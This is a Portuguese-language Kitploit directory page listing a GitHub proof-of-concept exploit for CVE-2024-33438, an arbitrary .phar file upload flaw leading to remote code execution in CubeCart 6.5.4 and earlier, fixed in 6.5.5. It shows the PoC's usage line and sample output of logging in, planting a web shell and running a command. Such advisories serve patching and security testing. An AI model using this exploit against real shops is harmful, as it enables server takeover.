Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 é vulnerável a um upload arbitrário de arquivo que leva à execução remota de código (RCE). | Kitploit
Ferramentas/GitHubGitHub/julio-cfa/cve-2024-33438
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 é vulnerável a um upload arbitrário de arquivo que leva à execução remota de código (RCE).

Ver Repositório
345há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Carregamento Arbitrário de Arquivos Leva a RCE (CVE-2024-33438)

CubeCart <= 6.5.4 é vulnerável a um problema de carregamento arbitrário de arquivos que leva à execução remota de código (RCE). A vulnerabilidade afeta o gerenciador de arquivos da aplicação e seus filtros, permitindo que atacantes carreguem arquivos .phar contendo código malicioso. O CubeCart deve ser atualizado para a versão 6.5.5, que implementa um patch de segurança para corrigir essa vulnerabilidade.

Para mais detalhes, consulte o anúncio oficial do CubeCart nas referências.

Exploit

Uma prova de conceito (PoC) automatizada foi criada, mas esta vulnerabilidade também pode ser explorada manualmente através do carregamento de um arquivo .phar malicioso via gerenciador de arquivos.

Este é o uso da PoC:

Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

Após executá-lo, esta é a saída esperada para uma exploração bem-sucedida:

python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

Referências

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
Baixar ferramenta